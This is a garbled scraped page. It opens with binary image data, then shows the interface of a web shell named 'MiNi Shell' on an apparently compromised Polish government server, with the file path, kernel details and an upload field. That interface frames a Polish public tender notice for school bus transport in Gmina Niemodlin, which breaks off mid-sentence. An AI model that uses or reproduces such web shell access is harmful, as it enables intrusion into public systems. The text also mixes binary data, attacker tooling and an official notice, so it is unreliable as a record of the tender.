JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221124/0045605901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczniów do szkół na terenie Gminy Niemodlin wraz z zapewnieniem opieki w czasie przewozu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centrum Usług Wspólnych w Niemodlinie</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">CUW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 365932620</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bohaterów Powstań Śląskich 37</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Niemodlin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">49-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dyrektor@cuwniemodlin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.cuwniemodlin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczniów do szkół na terenie Gminy Niemodlin wraz z zapewnieniem opieki w czasie przewozu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-26d06fe2-6bcf-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00456059</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00059143/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dowóz uczniów do szkół</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1)	miniPortalu, który dostępny jest pod adresem: https: //miniportal.uzp.gov.pl/;<br/>2)	adresu ePUAP Centrum Usług Wspólnych: /ZEFONiemodlin/SkrytkaESP, <br/>3)	poczty elektronicznej: dyrektor@cuwniemodlin.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy postępowania: „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do komunikacji”. <br/>2.Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz w Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). <br/>3.Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB. <br/>4.Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP/pocztę elektroniczną. <br/>5.Dane postępowanie można wyszukać na Liście wszystkich postępowań w miniPortalu:<br/>https://miniportal.uzp.gov.pl/ klikając opcję „Dla Wykonawców” lub ze strony głównej Zamawiającego w Biuletynie Informacji Publicznej (dalej BIP) w zakładce „Przetargi”.<br/>6.W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym, <br/>a Wykonawcami w szczególności składanie oświadczeń, wniosków (nie dotyczy składania ofert i oświadczeń o braku podstaw wykluczenia i spełnianiu warunków udziału w postępowaniu), zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal. <br/>7.W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania: CUW.261.1.2022<br/>8.Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, adres e-mail: dyrektor@cuwniemodlin.pl<br/>9.Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do komunikacji” jako załączniki. <br/>10.Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą poczty elektronicznej, na wskazany w ust. 8 adres email. <br/>11.Występuje limit objętości plików lub spakowanych folderów w zakresie korespondencji przesyłanej pocztą elektroniczną do maksymalnej wielkości 20 MB.<br/>12.W przypadku zaistnienia jednej z sytuacji określonych w art. 65 ust. 1, art. 66 i art. 69 ustawy Pzp, Zamawiający przewiduje sposób komunikowania się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 roku, osobiście lub za pośrednictwem posłańca. <br/>13.Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415).<br/>14.Do danych zawierających dokumenty tekstowe, tekstowo-graficzne lub multimedialne stosuje się między innymi formaty plików: .rft; .pdf; .xlsx .xls; odt; doc; docx; Zamawiający rekomenduje wykorzystanie formatów: .pdf .docx .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Pani/Pana danych osobowych jest: Gmina Niemodlin – Centrum Usług Wspólnych, ul. Bohaterów Powstań Śląskich 37, 49-100 Niemodlin;<br/>2.	W jednostce wyznaczony został inspektor ochrony danych, kontakt z administratorem: mail: kzdaniewicz@cuwniemodlin.pl lub pisemnie na adres administratora danych;<br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu wypełnienia obowiązku prawnego ciążącego na administratorze, związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego; <br/>4.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w trybie art. 8 oraz art. 96 ust. 3 ustawy pzp;<br/>5.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; <br/>6.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy pzp, związanym z udziałem <br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z przepisów ustawy pzp;<br/>7.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany stosowanie do art. 22 RODO; <br/>8.	Posiada Pani/Pan: <br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych. Skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników; <br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO. Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego; <br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu: <br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO – wypełnienie obowiązku prawnego ciążącego na administratorze.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CUW.261.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia dotyczy wykonania całościowego zadania pn. „Dowóz uczniów do szkół na terenie Gminy Niemodlin wraz z zapewnieniem opieki w czasie przewozu” <br/>i obejmuje swoim zakresem dowóz uczniów w okresie od dnia 02 stycznia 2023 r. do dnia 22 grudnia 2023 r. w obrębie następujących czterech trasach, stanowiących przedmiot zamówienia: <br/>1)	TRASA 1<br/>Dowóz uczniów do Szkoły Podstawowej Nr 1 w Niemodlinie, Szkoły Podstawowej Zespołu Szkół w Niemodlinie oraz Szkoły Podstawowej w Graczach na trasie opisanej zgodnie <br/>z Załącznikiem Nr 10 do SWZ.<br/>Szacunkowa liczba uczniów na trasie: uprawnionych do bezpłatnego przejazdu oraz nieuprawnionych została określona w Załączniku Nr 10 do SWZ. <br/>Dzienna liczba kilometrów: 109<br/>2)	TRASA 2<br/>Dowóz dzieci z miejscowości obwodu Szkoły Podstawowej Nr 1 w Niemodlinie, Szkoły Podstawowej przy Zespole Szkół w Niemodlinie, Szkoły Podstawowej w Rogach (wraz <br/>z uczniami realizującymi roczne przygotowanie przedszkolne) oraz Szkoły Podstawowej <br/>w Graczach na trasie opisanej zgodnie z Załącznikiem Nr 11 do SWZ.<br/>Szacunkowa liczba uczniów na trasie: uprawnionych do bezpłatnego przejazdu oraz nieuprawnionych została określona w Załączniku Nr 11 do SWZ. <br/>Dzienna liczba kilometrów: 87. <br/>3)	TRASA 3<br/>Dowóz uczniów z obwodu Szkoły Podstawowej Nr 1 w Niemodlinie, Szkoły Podstawowej przy ZS w Niemodlinie, Szkoły Podstawowej w Rogach (wraz z uczniami realizującymi roczne przygotowanie przedszkolne) oraz Szkoły Podstawowej w Graczach na trasie opisanej zgodnie z Załącznikiem Nr 12 do SWZ <br/>Szacunkowa liczba uczniów na trasie: uprawnionych do bezpłatnego przejazdu oraz nieuprawnionych została określona w załączniku nr 12 do SWZ. <br/>Dzienna liczba kilometrów: 122.<br/>4)	TRASA 4 <br/>Dowóz uczniów z miejscowości obwodu Szkoły Podstawowej Nr 1 w Niemodlinie, Szkoły Podstawowej przy Zespole Szkół w Niemodlinie, Szkoły Podstawowej w Rogach (wraz <br/>z uczniami realizującymi roczne przygotowanie przedszkolne) oraz Szkoły Podstawowej <br/>w Graczach na trasie opisanej zgodnie z Załącznikiem Nr 13 do SWZ. <br/>Szacunkowa liczba uczniów na trasie: uprawnionych do bezpłatnego przejazdu oraz nieuprawnionych została określona w załączniku nr 13 do SWZ. <br/>Dzienna liczba kilometrów: 32. <br/><br/>Ogółem liczba kilometrów: 350<br/>Liczba dni nauki szkolnej: 181 (Zamawiający zastrzega, że przyjęta szacunkowa liczba dni służy do skalkulowania ceny oferty)<br/><br/>Dodatkowe zapisy opisu przedmiotu zamówienia zawiera rozdział III SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</p> <p class="mb-0">63512000-1 - Usługi sprzedaży biletów podróżnych i pakietów wycieczkowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-02 do 2023-12-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybiera ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych<br/>w niniejszej SWZ, tj.:<br/>1) cena – waga 60 %<br/>2) „postępowanie w sytuacjach awaryjnych” (czas podstawienia taboru zastępczego) – 40%<br/>Zamawiający przy wyborze najkorzystniejszej oferty będzie kierował się kryteriami, które mają przypisana WAGĘ w skali od 0-100 wskazanymi jw.<br/>2. Sposób oceny ofert:<br/>Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) Kryterium „Cena” – maksymalna ilość punktów: 60<br/>Ocenie w ramach kryterium „cena” podlegać będzie całkowite wynagrodzenie ryczałtowe brutto podane w formularzu oferty.<br/>Liczba punktów, którą można uzyskać w tym kryterium zostanie obliczona wg poniższego wzoru:<br/>Pp = (Cn / Co)*100 punktów*60%<br/>gdzie:<br/>Pp – liczba punktów przyznana w kryterium ceny,<br/>Cn – najniższa cena spośród ofert nie odrzuconych,<br/>Co – cena oferty badanej (rozpatrywanej).<br/>2) Kryterium „postępowanie w sytuacjach awaryjnych” (czas podstawienia taboru zastępczego) – maksymalna ilość punktów: 40<br/>W ramach wynagrodzenia należnego Wykonawcy wymagane będzie podstawienie taboru zastępczego w sytuacjach awaryjnych. <br/>Liczba punktów za to kryterium zostanie przyznana na podstawie zaznaczonej przez Wykonawcę w formularzu ofertowym opcji, w sposób następujący:<br/>- czas podstawienia taboru zastępczego będzie większy niż 30 minut – 0 punktów,<br/>- czas podstawienia taboru zastępczego będzie wynosił od 20 do 30 minut – 20 punktów,<br/>- czas podstawienia taboru zastępczego będzie mniejszy niż 20 minut – 40 punktów<br/>W przypadku gdy Wykonawca nie uzupełni kryterium w ofercie lub uzupełni kilka pól Zamawiający przyzna 0 punktów.<br/>3. Za najkorzystniejszą zostanie uznana oferta, która otrzyma najwyższą ilość punktów w wyniku<br/>sumowania punktów w kryteriach oceny ofert i odpowiadającą wszystkim warunkom przedstawionym w niniejszej SWZ.<br/>4. Punktacja będzie liczona z dokładnością do dwóch miejsc po przecinku z uwzględnieniem trzeciej cyfry po przecinku tj.: części setnych zgodnie z zasadą zaokrągleń matematycznych zastosowanych w programie Excel.<br/>5. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze (kryterium „Cena”).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">„postępowanie w sytuacjach awaryjnych” (czas podstawienia taboru zastępczego)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O UDZIELENIE ZAMÓWIENIA MOGĄ UBIEGAĆ SIĘ WYKONAWCY, KTÓRZY SPEŁNIAJĄ NIŻEJ WYMIENIONE WARUNKI UDZIAŁU DOTYCZĄCE:<br/>1)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada:<br/>a)	aktualną licencję do wykonywania transportu drogowego osób na podstawie ustawy<br/>z dnia 06 września 2001 r. o transporcie drogowym (Dz.U. z 2022 r. poz. 2201), <br/>2)	zdolności technicznej lub zawodowej – Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>a)	wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonują, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jedną usługę, której przedmiotem zamówienia był lub jest przewóz uczniów o wartości min. 30 000 zł brutto;<br/>Zastrzeżenie: Jeżeli Wykonawca wykazuje usługę nadal trwającą, musi wykazać, iż na dzień złożenia oferty jest ona należycie zrealizowana na wartość min. 30 000 zł brutto. <br/>Uwaga: W przypadku wskazania przez Wykonawcę, w celu wykazania spełniania warunków udziału, waluty inna niż polska (PLN), w celu jej przeliczenia stosowany będzie średni kurs NBP na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.<br/>Uwaga: Zamawiający informuje, że uzna za wykonane/wykonywane w sposób ciągły usługi przerwane przez przerwę związaną z wystąpieniem epidemii (COVID19).<br/>Uwaga: Mając na uwadze art. 117 ust. 1 ustawy Zamawiający zastrzega, że w sytuacji składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz analogicznie w sytuacji, gdy Wykonawca będzie polegał na zasobach innego podmiotu, na zasadach określonych w art. 118 ustawy, warunek o którym wyżej mowa, musi zostać spełniony w całości przez Wykonawcę (jednego z Wykonawców wspólnie składającego ofertę) lub podmiot, na którego zdolności w tym zakresie powołuje się Wykonawca – brak możliwości tzw. sumowania zasobów w zakresie doświadczenia. <br/>Uwaga: Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi Wykonawcami, należy wykazać usługę (zakres), w której Wykonawca bezpośrednio uczestniczył.<br/>b)	dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi kwalifikacje zawodowe odpowiednie do stanowisk, jakie zostaną im powierzone, tj.:<br/>-co najmniej jedną osobą (na każdą trasę odrębnie), która będzie pełnić funkcję kierowcy, posiadającego prawo jazdy odpowiedniej kategorii, uprawniającej do prowadzenia pojazdów, o których mowa poniżej w punkcie 4c) z minimum 1 rocznym doświadczeniem w zakresie przewozu osób oraz<br/>-co najmniej jednym opiekunem (na każdą trasę odrębnie)<br/>Wymagania względem opiekunów: funkcję opiekuna może sprawować wyłącznie osoba pełnoletnia, mająca w pełni zdolność do czynności prawnych. <br/>Zastrzeżenie: kierowca nie może być jednocześnie opiekunem. W autobusie musi znajdować się kierowca i opiekun. <br/>c)	dysponuje lub 